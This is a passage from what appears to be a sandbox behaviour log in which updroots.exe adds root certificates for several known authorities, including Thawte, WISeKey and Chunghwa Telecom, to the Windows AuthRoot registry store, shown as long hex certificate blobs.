30c7892f47980fa303c6f6f1acdf32f0d9811ae49cbdf68014f0d12cb985f5d8a3b1c8a521e51c1397ee0ebddf29a9ef34535bd3e46a138406b63202c452ae22d2dcb221421ada40f029c9ec0a0c5ce2d0bacc48d3370acc120a8a79b03d037f694bf434207db334ea8e4b64f53efdb32367150d04b8f02dc109513cb26c15f0a523d78374e4e52ec9fe982742c6abc69eb0d05b38a59b50de7e1898b5453bf679b4e8f71a7b0683fbd08bdabbc7bd18ab086f3c806b403f1919ba658ae6bed55cd336d7ef4052246038670431ec8ff382c6deb955f33b31915adcb50815ad76250a0d7b2e87e20ca606bc26106d379decdd788c7c80c5f0d97748d0 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\027268293E5F5D17AAA4B3C3E6361E1F92575EAA C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\150332A58DC591FC42D4C873FF9F1F0F81D597C9 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8EFDCABC93E61E925D4D1DED181A4320A467A139\Blob = 0b00000001000000520000004100750074006f00720069006400610064006500200043006500720074006900660069006300610064006f007200610020005200610069007a002000420072006100730069006c0065006900720061000000090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080300000001000000140000008efdcabc93e61e925d4d1ded181a4320a467a1392000000001000000bc040000308204b8308203a0a003020102020104300d06092a864886f70d01010505003081b4310b300906035504061302425231133011060355040a130a4943502d42726173696c313d303b060355040b1334496e7374697475746f204e6163696f6e616c206465205465636e6f6c6f67696120646120496e666f726d6163616f202d204954493111300f0603550407130842726173696c6961310b30090603550408130244463131302f060355040313284175746f72696461646520436572746966696361646f7261205261697a2042726173696c65697261301e170d3031313133303132353830305a170d3131313133303233353930305a3081b4310b300906035504061302425231133011060355040a130a4943502d42726173696c313d303b060355040b1334496e7374697475746f204e6163696f6e616c206465205465636e6f6c6f67696120646120496e666f726d6163616f202d204954493111300f0603550407130842726173696c6961310b30090603550408130244463131302f060355040313284175746f72696461646520436572746966696361646f7261205261697a2042726173696c6569726130820122300d06092a864886f70d01010105000382010f003082010a0282010100c0f32e7705ff86f9be521d9bfe54007075408ac6a668b916764c0ff7f4bfb4e288811acbe8ecbe6481a539475deae62d93d31aff7a54a6071f3408f4bd89b982cca3428f5e9ac73ec7a9b8556c24f62a8c65208ae4442402afd4b789fb2ae2c4d7e81d7edc1d220c5f52c3ede02c8dad8e74415e7b28cd944fcc79aeb9b3123afb4c8086a52500976815a9eeb16a28be6e6611d50ae659a052006e7d2eb92b8eb62d6d18456e85037b50cafba4fcb392fa93c73ca24a5b1e96bdbde333b43542f6c3c9eb43165e1e9a9d52a8d5470b71b511c8478dbd99de551280014ea8bb07630efc25b1a2b27452b079dd13a10e3b6e650a81c9bec15dde4d1937e943a74f0203010001a381d23081cf304e0603551d200447304530430605604c010100303a303806082b06010505070201162c687474703a2f2f61637261697a2e69637062726173696c2e676f762e62722f44504361637261697a2e706466303d0603551d1f043630343032a030a02e862c687474703a2f2f61637261697a2e69637062726173696c2e676f762e62722f4c435261637261697a2e63726c301d0603551d0e041604148afaf157841113359042fa574954690da4c4f037300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106300d06092a864886f70d010105050003820101001903973553f860221e8e7202c07e2260156a6f983656aa5577d3f6c71698fc881a1b2529b9b83a6ded38ab621d54c5eddf41a1a562325efbdcddfa2ccf45b06a5cf550037e045dcc24e2aa56b9fd611eb8967ddaf1f0072a4aaafa0ae405c12afbe45a2c4b39700c00daef4993ef06630264219d9c76c49eb07d6953f5541f4bffc961e21cec5b9ed8934b774d1439230c6a22bfb7bf5e9ca347100d9fba91f7bc48a07f9121e1b54037956886b4e6e8c639df1ed741966bd4c13b6b9e651449d2793d2e9a53808d1da601bbd23395f9a1264dae67ad773c938f67e508cf020bb30b69bd2491d9e04489540461c5d7f4b99e63db2bef40e3ab1ddf7a2a2bc9fc C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\9FAD91A6CE6AC6C50047C44EC9D4A50D92D84979\Blob = 0300000001000000140000009fad91a6ce6ac6c50047c44ec9d4a50d92d84979090000000100000020000000301e06082b0601050507030106082b0601050507030306082b060105050703080b0000000100000030000000540068006100770074006500200053006500720076006500720020004300410020002800530048004100310029000000200000000100000026030000308203223082028ba003020102021034a4fff630af4ca53c331742a1946675300d06092a864886f70d01010505003081c4310b3009060355040613025a41311530130603550408130c5765737465726e204361706531123010060355040713094361706520546f776e311d301b060355040a131454686177746520436f6e73756c74696e6720636331283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e3119301706035504031310546861777465205365727665722043413126302406092a864886f70d01090116177365727665722d6365727473407468617774652e636f6d301e170d3936303830313030303030305a170d3231303130313233353935395a3081c4310b3009060355040613025a41311530130603550408130c5765737465726e204361706531123010060355040713094361706520546f776e311d301b060355040a131454686177746520436f6e73756c74696e6720636331283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e3119301706035504031310546861777465205365727665722043413126302406092a864886f70d01090116177365727665722d6365727473407468617774652e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100d3a4506ec8ff566be6cf5db6ea0c687547a2aac2da8425fca8f44751da85b5207494861e0f75c9e90861f5066d306e151902e952c062db4d999ee26a0c4438cdfebee3640970c5feb16b29b62f49c83bd427042510972fe7906dc0284299d74c43dec3f5216d549f5dc358e1c0e4d95bb0b8dcb47bdf363ac2b5662212d6870d0203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d010105050003818100be4069416fc6dbc1a7bf07c045e4d0b5431e4c953335e95ec23e28f6a80d50d5ffe20c0ffc50028eae91b9ad348a8d9f2771aa19cc4be804cad4176b121ad6c65fd6cd5eff8976bfd848d859bd088a891d57cd451e52ba129a84fa18895fe8f930356a0160b9998083850a6edaf4c98f5e732d314a63a074f21f8b22d2293eeb C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4B6BD2D3884E46C80CE2B962BC598CD9D5D84013\Blob = 0300000001000000140000004b6bd2d3884e46c80ce2b962bc598cd9d5d84013090000000100000020000000301e06082b0601050507030106082b0601050507030206082b060105050703040b000000010000002c0000004f00410054004900200057006500620043004100520045005300200052006f006f00740020004300410000002000000001000000730a000030820a6f30820857a0030201020210025762066a7560874f9004bfa1c82841300d06092a864886f70d0101050500308183310b3009060355040613025553310b3009060355040813024d4e311430120603550407130b4d696e6e6561706f6c69733131302f060355040a13284f70656e2041636365737320546563686e6f6c6f677920496e7465726e6174696f6e616c20496e63311e301c060355040313154f41544920576562434152455320526f6f74204341301e170d3038303630333139323833315a170d3338303630333139333630305a308183310b3009060355040613025553310b3009060355040813024d4e311430120603550407130b4d696e6e6561706f6c69733131302f060355040a13284f70656e2041636365737320546563686e6f6c6f677920496e7465726e6174696f6e616c20496e63311e301c060355040313154f41544920576562434152455320526f6f7420434130820220300d06092a864886f70d01010105000382020d00308202080282020100de789943ae5e611e2dd27578f53e2c36428acc7cb6df17776156a7cce33a802181b26ed067b5cfa5a176be280d125683aa96bb24813b6bf9c103b08bb40704f999d03fb48afec0e5122a95bf152f0ade17016b55cab4e8b3b293e6e34cbc0711783dfffb3376bcb832bc9e1603dcd1fd6add54cb27e04bd4396990f0ba82220f6775256bc36236f7989104caff12745ecba9b67763f11be4444e8636da6b682f905da135985ca5528a70ba435e5cdf2df132f8acf3f6ed92c36263b75648c7611e12b721abb8dd6b6490d0477000b768ce96bd4f42e50b9b7a4d59b91ca4aeef67b594b6489b3f8b0449e6fc29e3f6f1399d5a4a2014e01bc15843196dba9d226c86cbba19ff58a05644f16f515b580bf77b777ffb2cd108ba157e74e8ea673429b85b93bba630e9849197b02a07a9dba9b5889adc93d965e61b70cccd458e5691d55b1bf3df6a35e2c8863eade58d7a0b28740fc07c1268c8fd94b68849ac565700eb0c3fe551a39cea3611fd4ad6f20a20d1601338c360acb8677125e1dd0479f610bf44c5f26dd03c95dabde3bb8d099da3207694b50f118e46333a5e95b786c4e3e4c803db9cb2d844fbde3eb066a1400d82490916bb7803e69d67912ce380eb2bf7742f8148fbca244b0411ab1950660522c8f29cec5a5b24322b89eda7a171b6530e39fbf4aede19f3e5df02bda4f536b7e63f1a0932ad1de320d8008f020103a38204dd308204d9300b0603551d0f040403020146301306092b060104018237140204061e0400430041300f0603551d130101ff040530030101ff301d0603551d0e04160414e50d64719dc952e9c09b2a6933c0937cf381f5df30700603551d1f046930673065a063a0618631687474703a2f2f63657274732e6f61746963657274732e636f6d2f7265706f7369746f72792f4f4154494341322e63726c862c687474703a2f2f63657274732e6f6174692e6e65742f7265706f7369746f72792f4f4154494341322e63726c301006092b06010401823715010403020100308203750603551d200482036c308203683082036406082a864886fc660b01308203563082035206082b06010505070202308203441e8203400046006f00720020006d006f0072006500200069006e0066006f0072006d006100740069006f006e00200072006500670061007200640069006e00670020004f004100540049002000630065007200740069006600690063006100740065007300200061006e006400200074006800650020004f004100540049002000770065006200430041005200450053002000530079007300740065006d002c00200070006c0065006100730065002000730065006500200074006800650020004f004100540049002000430065007200740069006600690063006100740069006f006e002000500072006100630074006900630065002000530074006100740065006d0065006e0074002000280043005000530029002000610074002000740068006500200066006f006c006c006f00770069006e00670020006c006f0063006100740069006f006e003a00200068007400740070003a002f002f007700770077002e006f00610074006900630065007200740073002e0063006f006d002f007200650070006f007300690074006f00720079002e002000200049006600200079006f0075002000680061007600650020007300700065006300690066006900630020007100750065007300740069006f006e007300200074006800610074002000630061006e006e006f007400200062006500200061006e00730077006500720065006400200062007900200074006800650020004f00410054004900200043005000530020006f007200200077006f0075006c00640020006c0069006b00650020004f004100540049002000770065006200430041005200450053002000700072006f006400750063007400200069006e0066006f0072006d006100740069006f006e002c00200070006c006500610073006500200065002d006d00610069006c00200079006f0075007200200072006500710075006500730074007300200074006f0020004f004100540049002000610074002000740068006500200066006f006c006c006f00770069006e006700200061006400640072006500730073003a00200043007500730074006f006d00650072005f00530065007200760069006300650040006f00610074006900630065007200740073002e0063006f006d002e30818706082b06010505070101047b3079303d06082b060105050730028631687474703a2f2f63657274732e6f61746963657274732e636f6d2f7265706f7369746f72792f4f4154494341322e637274303806082b06010505073002862c687474703a2f2f63657274732e6f6174692e6e65742f7265706f7369746f72792f4f4154494341322e637274300d06092a864886f70d01010505000382020100b05715067bbfe10082fb9f07e056f4ac84359c817568785150da70783fbb35d73c76694f45016d1d2daf42b0336eff9c0afba9d1fca9da8fa54b4a872d22a4b2e0f4170e04b8eb0e427307efd4ba8f4212d30e2dbb6d54c901c93f4dd6ee0c425689da62370ba1487d6cc4b1c7ab4462cba63cf465a07ddff36062c58af889f5db2186539de7c8304fdb2571392d84f12978215699d65f4849bb33b8c9cf3ce32b156a445e3a09603ec0d2201676bc66f25b03193f4ab69e9edda21a583e73efb7697b7b9007399a6733bb5692bafeae9d624b55612e961fc654952d65be491811f7f7fdb6c606a1320f756f16e12462c80e6f3af29580f1a9fba07d4dd5a2431f8560d65c792bcc34cfa177efe6d3ce7385b4d8678999bc6fcb0e07272e7551897fc13bdf0d03bf8817e6bcfa940ca819b0c3d1aa80a819d9b644d2952b57225bc82dae0ed008ada27b3400e096ff92ca39cdc0c3d2ccb9f437c356a4d7a61a801e6c3372cd56fb5fe5dddc305beeb84cb3df5ab09124e28d1c310f29b3072085d676ca3eba778bf8f550850d4f36716b551209403b031538fee597784b281db880bb8eb2fae0b21dc2788929b38e0cec005f4e47b59dcbdc4dc2c875c83e5046d87cdf86caf5712a940a6d576f78eaf2d7e5e35754775b6297d7ec91ce4273de904abf821c95d91948d0fc9b2719fb89f3e6101344d902bbc55f636f659b31 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\971D3486FC1E8E6315F7C6F2E12967C724342214 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\FA0882595F9CA6A11ECCBEAF65C764C0CCC311D0 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\55A6723ECBF2ECCDC3237470199D2ABE11E381D1 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\67650DF17E8E7E5B8240A4F4564BCFE23D69C6F0\Blob = 0b00000001000000340000004300680075006e0067006800770061002000540065006c00650063006f006d00200043006f002e0020004c00740064002e000000090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b0601050508020203000000010000001400000067650df17e8e7e5b8240a4f4564bcfe23d69c6f02000000001000000b4050000308205b030820398a003020102021015c8bd65475cafb897005ee406d2bc9d300d06092a864886f70d0101050500305e310b300906035504061302545731233021060355040a0c1a4368756e676877612054656c65636f6d20436f2e2c204c74642e312a3028060355040b0c2165504b4920526f6f742043657274696669636174696f6e20417574686f72697479301e170d3034313232303032333132375a170d3334313232303032333132375a305e310b300906035504061302545731233021060355040a0c1a4368756e676877612054656c65636f6d20436f2e2c204c74642e312a3028060355040b0c2165504b4920526f6f742043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a0282020100e1250fee8ddb88337567cdad1f7d3a4e6d9dd32f14f36374cb01216a37ea8450074b265b09436c219e6ac8d503f560698fccf022e41fe7f76a2231b72c15f2e0fe006a43ff8765c6b51ac1a74c6d2270218a31f29774890912261c9ecad912a2953cdae967bf08a064e3d642b745ef97f4f6f5d7b54a1502587d98584b60bccdd70d9a133353d161f97ad5d778b39a33f70086ce1d4d9438afa8ec7851708a5c10835121f7113d34865ee548cd978182354c19ec65f66bc505a1ee4713d6b3212794100ad9243bbabe441346303f973cd8d7d76aee3b38e32bd4970eb91be707497f372af97778cf54ed5b469da3800e9143c1d65b5f14ba9fa68d24474059bf7238b2366c37ff99d15d0e590aab69f7c0b204457a5400aebe53f6b5e7e1f83ca331d2a9fe215264c5a667f075070694148155c627e4018f17c16a71d7be4bfb94587d7e1133b142f7626c18d6cf09683e7f6cf61e8f62ada563db09a71f2242411e6f998a3ed7f93f407a79b0a50192d29d3d0815a510012db33276a8950db37a9afb071078116fe18fc7ba0f251a742ae51c984199df2187e895066a0ab36a477665f63acf8f6217197b0a28cd1ad2831e21c72cbfbeff6168b7671bbb784d8dce67e5e4c18eb72366e29d90753498a9362b8a9a94b99deccc8ab1f825895c5ab62f8c1f6d7924a75268c38435e2668d630e254dd519b2e67937a7229d54310203010001a36a3068301d0603551d0e041604141e0cf7b667f2e192260945c055392e773f424aa2300c0603551d13040530030101ff30390604672a07000431302f302d020100300906052b0e03021a050030070605672a030000041445b0c2c70a567cee5b780c95f91853c1a61cd810300d06092a864886f70d0101050500038202010009b3835359013e9549b9f181baf9762023b5276074d46a99345e6c0053d99ff2a6b12407446a2ac6a58e7812e847d9581b132a5e799b9f0a2a67a6253f06695673c38a6648fb2981577406ca9cea28e83867262bf1d5b53f6593f8365d8e8d8d40208719eaef27c03db4390f257b685074559c0c597d5a3d4194255208e0472c153119d5bf0755c6bb12b597f45f8385ba71c1d96c8111760a0ab0bf8297f7ea3dfafaec2da928943b56ddd2512eaec0bd08158c77523496d69bacd31d8e610f357b9bae39690b62604020368faffb36ee2d084a1db8bf9b5cf8eaa51ba073a6d8f86ee033045f68aa2787edd9c1909cedbde36a35af63dfab18d9bae6e94aea508a0f61931ee22d19e2309435925d0eb607af19808f4790514b2e4ddd85e2d20a520a179afc1ab05002e501a36337214c44c49b5199110e739c068f542ea7285e443987562d37bd854494e10c4b2c9cc392853461cb0fb89b4a4352fe343a7db8e929dc76a9c830f8147180c61e36487422415c8782e818718b418944e77e585ba8b88d13e9a76cc347edb31a9d62ae8d82ea949edd5910c3addde24de331d5c7ece8f2b0fe921e160a1afcd9f3f827b6c9be1db46c64907ff4e4c45bd737ae420edda41a6f7c8854c5166ee17a682ef83abf0da43c893b78a74e6383042108678df28249d05bfdb1cd0f8384d43e2085f74a3d2b9cfd2a0a094dea81f8119c C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B8236B002F1D16865301556C11A437CAEBFFC3BB\Blob = 53000000010000002400000030223020060a2b06010401828f09020430123010060a2b0601040182373c0101030200c00b00000001000000180000005400720065006e00640020004d006900630072006f000000090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b06010505070307030000000100000014000000b8236b002f1d16865301556c11a437caebffc3bb200000000100000002020000308201fe30820185a00302010202087497258ac73f7a54300a06082a8648ce3d0403033045310b300906035504061302555331143012060355040a0c0b41666669726d54727573743120301e06035504030c1741666669726d5472757374205072656d69756d20454343301e170d3130303132393134323032345a170d3430313233313134323032345a3045310b300906035504061302555331143012060355040a0c0b41666669726d54727573743120301e06035504030c1741666669726d5472757374205072656d69756d204543433076301006072a8648ce3d020106052b81040022036200040d305e1b159d03d0a17935b73a3c927aca151ccd62f39c265c073de554faa3d6cc12eaf4145fe88e19ab2f2e48e6ac184378acd037c3bdb2cd2ce647e21ae663b83d2e2f78c44fdbf40fa4684c55726b951d4e18429578cc373c91e29b652b29a3423040301d0603551d0e041604149aaf297ac011353526513000c36afe40d5aed63c300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106300a06082a8648ce3d040303036700306402301709f38788505aafc8c042bf475ff56c6a86e0c42774e43853d7057f1b34e3c62fb3ca093c379dd7e7b846f1fda1e271023042598743d451dfbad309325ace887e573d9c5f426bf5072db5f08293f9596fae64fa58e58b1ee363beb581cd6f028c79 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DB2B7B434DFB7FC1CB5926EC5D9521FE350FF279\Blob = 0b000000010000001c00000041007400680065007800200052006f006f0074002000430041000000090000000100000036000000303406082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303060a2b0601040182370a0304030000000100000014000000db2b7b434dfb7fc1cb5926ec5d9521fe350ff27920000000010000003b030000308203373082021fa0030201020202271c300d06092a864886f70d01010505003044310b3009060355040613024752311d301b060355040a1314417468656e732045786368616e676520532e412e311630140603550403130d415448455820526f6f74204341301e170d3130313031383135353630335a170d3330313031373231303030305a3044310b3009060355040613024752311d301b060355040a1314417468656e732045786368616e676520532e412e311630140603550403130d415448455820526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100cd1a3d30b5b338b2bf7abbaea1d6d785f0223aa48969c4e16204c970d33c3312e2e638e577a42444640db7ae4c5adde118063eed9b5a05f5e1de12ed362adc47d9915199edb1bf6a73a10a0824a88a8d1c0b59d3bf70235544a08c30c5ce6d4fb0ecbef38c31df0a5adcd3575c05a033953b978f540bb8f56b7dc7c5acb5798e0638f1a829553d9a36d0275f346a12781728d99849ecd95a52da263afaee4ca6268ea83e551fb21fe1b59bf93a35f6ed911cfd0b1024fd1ff9d3e30025b10b25c0b77d9a3c073a800bd6a8fe9145e8c1d2c5226fd3e5711fb62c36b458a0edcd4a68e46a57f4a175ecd70099d5f6995ceb4ec9bbd71aa34559000f8c3bdb74350203010001a3333031300f0603551d130101ff040530030101ff30110603551d0e040a040843e280e8bbd2b7c1300b0603551d0f040403020106300d06092a864886f70d010105050003820101003f01637507322b5f75ff768ed3a9b86fcc503d84574f2883e87ca36ea2bcf7c2baae3aab4ed00f9228b8dd5b2cdbe5d61f3a93e1910ed7aa5f01612c3e614fde95154dcc3dea32e2a3fef816a9f2bc29fc299e7d72a55da16b02d55f48f4a03bcb1846f03d175583d0296191bb9a4149d113be4194f23ec324ab9fc76b429042797e5a51fb3c5e0b211fcbd9481315b16a7f03c4d1ba51d27089aa084a871cf67a98b1d4510555c690176fc3e004c07af42f18a25642732eb6b29bd139be09c2024a2417f9f7acbd7107bf95e297e5a184088db2e244a1dc89303ba80c057a5d76004f1e6f717f2b39da45423931d2a93240d438631396379a495dd9c7fdb84c C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\06143151E02B45DDBADD5D8E56530DAAE328CF90\Blob = 03000000010000001400000006143151e02b45ddbadd5d8e56530daae328cf90090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030806082b0601050507030606082b06010505070307060a2b0601040182370a030406082b060105050703030b000000010000002e0000004d006100630061006f00200050006f0073007400200065005300690067006e00200054007200750073007400000020000000010000009a050000308205963082037ea003020102021052acbe07114997bb1fbf871b2517bfa4300d06092a864886f70d01010505003065310b3009060355040613024d4f31133011060355040a130a4d6163616f20506f73743141303f060355040313384d6163616f20506f737420655369676e547275737420526f6f742043657274696669636174696f6e20417574686f72697479202847303229301e170d3130303130363030303030305a170d3230303130353233353935395a3065310b3009060355040613024d4f31133011060355040a130a4d6163616f20506f73743141303f060355040313384d6163616f20506f737420655369676e547275737420526f6f742043657274696669636174696f6e20417574686f7269747920284730322930820222300d06092a864886f70d01010105000382020f003082020a0282020100b6f887a774cc5d235eaeab96dcd724281da41466d7a0688c5e9d45d4d429d3b30bebad16ea9d5211c9a4e170e5ddbe0e1c1177eb9fa37078178fb93e175369a9ebf555f99597e9df39769e1f5217b41b0012d0cd3ce3aa49d19e413736f561cd230f57b1f64dd3db0d42530288f4f0a9868b57cf720ad5944b5ada37e53d475967bed38e56d55739d027db9f494fa81654bf785fcf1c9d5ea10b8c8303b30c14c95aa9bbffc6ae59cff5651f238901538ad55b179d9bff98510f4349f7aa2cede5e9863a335073dc52a56b6384e913a27cc7771af3aaa90d0b4e4e1d44c3723b9959e741223b2c545e123196684119d5ed75a7b9575b11f69aa4492f62f30b98511bb33342d2ccd46119c3d3dc9bfb93b262cd36fb8ce91a6e1ab139248e5dd93e3b867c88e6b72703f89551b0bf5037fef84e13011b272d9b92d07257d7a39a56e86ba3f755de405de2081f5cbb51a69eb4dd0ea61a596267867310959d95cdbabfd89c2a0e8b769993d44bb0e8543f0dd88af980cf41fd017a457c7dd63d4ef9624f41257caa6d58561b07b473aa1f111f3cba5323e0ed4acd9689dc48d04d62cb9307f6a0ae53177c5f5c071c054cab4c6aaac20fa0196b7979c27cb3a9fd3dfbcc7c71c5bbbe256d21a7fbd6be60f3b5a9a96c74183fa89e426041f2392d1dc20d73f2e0b1b64a1a18bd776919d7d27ab1dc96359ad8268583b61329c2e30203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604140281b7b666f892456dc271d29fec2fd3ba1fb9ff300d06092a864886f70d0101050500038202010058538bbecf41b24fb6d5de4a68cd65cfc6408aac4b9a5b636dbdf13f595042d0df9ae35f5691b35b9bd9450643ef931bfd33771d06543848f1548c3a536b3b7135097665e9570f43f6919ade10bbba68922a25cb6744096bbf9d9766cba945b6be37991d7525be3d3c636cbfa91347c7728ccbc3cff4f68705998917a83420f1dfa12767d3a723efab59833d1ad82acdc2ad4a300c063a208ba4f8da4637432eb4891d84738a60be64312742c0eb72616dccde7c732be8bf39425e7991ec801baa36764e21e88604970928cb47e740d42c5e1a5e48faaec7e904ea47249bbef1479ed5d57ad15ed485f20b230498d42b9a5672464c419a33f092b4bf41d4bd9bb0b3f1f513d6af5bd4f2d141f0475d7abc7a59f17d6068940e4a4f819222aa1fc43cbe1c3a3a4cf070a17fbb9fdcd2c5a4f1266ee1f326a970fbf1899662155c59a0b523fa966ab21a923d0d244a2bb808fe6fdfdcc2ee96ffcebf7bb8f984ef413be44db98791bac65fc8edf0cb8bd30f91f620de9198c6e74864d1ce5312eec4156ddc80501b13604f795bfc1a9cfea29fa0113391c94b6d3a66962dd338f8d99981b444267fb1e79e706d1d6df52209e4ac1936fb2705d87a9bd9bc9e1bda1937d8f1dd1598641b8f53f0289dac14ba5f69cf9623ee56ac99cd3a8fd55e19e662133a5feb8b5f16c03be1d1938f56613705d0791bfda8bc0f79d2b3e6d366 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5922A1E15AEA163521F898396A4646B0441B0FA9\Blob = 0b00000001000000400000004f004900530054004500200057004900530065004b0065007900200047006c006f00620061006c00200052006f006f0074002000470041002000430041000000090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080300000001000000140000005922a1e15aea163521f898396a4646b0441b0fa92000000001000000f5030000308203f1308202d9a0030201020210413d72c7f46b1f81437df1d22854df9a300d06092a864886f70d010105050030818a310b30090603550406130243483110300e060355040a1307574953654b6579311b3019060355040b1312436f7079726967687420286329203230303531223020060355040b13194f4953544520466f756e646174696f6e20456e646f72736564312830260603550403131f4f4953544520574953654b657920476c6f62616c20526f6f74204741204341301e170d3035313231313136303334345a170d3337313231313136303935315a30818a310b30090603550406130243483110300e060355040a1307574953654b6579311b3019060355040b1312436f7079726967687420286329203230303531223020060355040b13194f4953544520466f756e646174696f6e20456e646f72736564312830260603550403131f4f4953544520574953654b657920476c6f62616c20526f6f7420474120434130820122300d06092a864886f70d01010105000382010f003082010a0282010100cb4fb3009b3d36ddf9d1496a6b10491fecd82bb2c6f832812943954c9a1923211545dee3c81c51555bae93e837ff2b6be9d4eabe2adda8512bd766c3615c6002c8f5ce727b3bb8f24e65089acda46a19c101bb73a6d7f6c3ddcdbca48bb59961b801a2a3d44dd4053d91adf8b4087164af70f11c6b7ef6c3779d24737be40c8ce1d936e1998b05990bed453109cac200dbf772a096aa9587d08ec7b661730d76668cdc1bb463a29f7f931330f1a127dbd9ff2c558891a0e04f07b028568c181b97448e89dde0176ee72aef8f390a318482d84014492e7a41e4a7fee364ccc159714b2c21a75b7de01dd12e819bc3d868f7bd961bac70b116140bdb60b92601050203010001a351304f300b0603551d0f040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b3037eae36bcb079d1dc9426b611be21b2698694301006092b06010401823715010403020100300d06092a864886f70d010105050003820101004ba1ff0b876eb3f9c143b148f328c01d2ec90941fa94001ca4a4ab494f8f3d1eef4d6fbdbca4f6f22630c910ca1d88fb74191f8545bdb06c51f9367edbf54c323a414f5b47cfe80b2db6c4199d74c547c63b6a0fac14db3cf4739ca905df00dc7478faf83560590213187cbcfb4db0206d43bb60307a67335cc599d1f82d395273fb8caa97255c72d9081eab4e3ce381319f03a6fbc0fe298855da84d55003b6e284a3a636aa113a01e1184bd64468b33df9537484b34691469600b7802cb6e1e310e2dba2e7288f019662163e00e31ca5368118a24c5276c011a36ee61dbae35abe3653c53e758f8669295853b59cbb6f9f5cc518ecdd2fe198c9fcbedf0a0d C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\086418E906CEE89C2353B6E27FBD9E7439F76316\Blob = 030000000100000014000000086418e906cee89c2353b6e27fbd9e7439f76316090000000100000040000000303e06082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070308060a2b0601040182370a030c0b000000010000003800000056004100530020004c0061007400760069006a006100730020005000610073007400730020005300530049002800520043004100290000002000000001000000ad070000308207a930820591a0030201020210630686a7c53765a54390a86a58ccd432300d06092a864886f70d010105050030818f310b3009060355040613024c5631353033060355040a132c564153204c617476696a6173205061737473202d205669656e2e7265672e4e722e343030303330353237393031233021060355040b131a536572746966696b6163696a61732070616b616c706f6a756d69312430220603550403131b564153204c617476696a6173205061737473205353492852434129301e170d3036303931333039323231305a170d3234303931333039323735375a30818f310b3009060355040613024c5631353033060355040a132c564153204c617476696a6173205061737473202d205669656e2e7265672e4e722e343030303330353237393031233021060355040b131a536572746966696b6163696a61732070616b616c706f6a756d69312430220603550403131b564153204c617476696a617320506173747320535349285243412930820222300d06092a864886f70d01010105000382020f003082020a02820201009bb8f9fd61552f4fa4a514b52e8eb9248facfbb1543f40ff4fc5e586687b5393fb358235a8502e9452a0db833e75da1570ac09cfee8249ad3649b9b4718bb400a14206ca080a6397b608fceeb4dc98781982c9f87f643eaac9feb18debb064f5bcf3c43e3a90ea4e8e3f1b19bc6a83c3913c6c55fb0a52c0e8e15d778533c549dfec6abfbf6c37fe8e49a21518ce8b8e6b1e38a3306f88817e7256441ac47a390ff6c48f96d4b2eb004e5cdebbe73bb7e62405936b4de69144bfee981bc7851b11417b2236a7be3ee87a37dc18de909d8fcdb2d79a3fe2177f5b0ce1ef3f663d6e24e4b0cec30c886c94da38257c5239e37314b30045639a0c42405e04c6f77264cec96e33b3e4d36d249537937ef2005d198b1ff34373a89f45d206a9ecb442bbfaee0cc74f3f511fd1a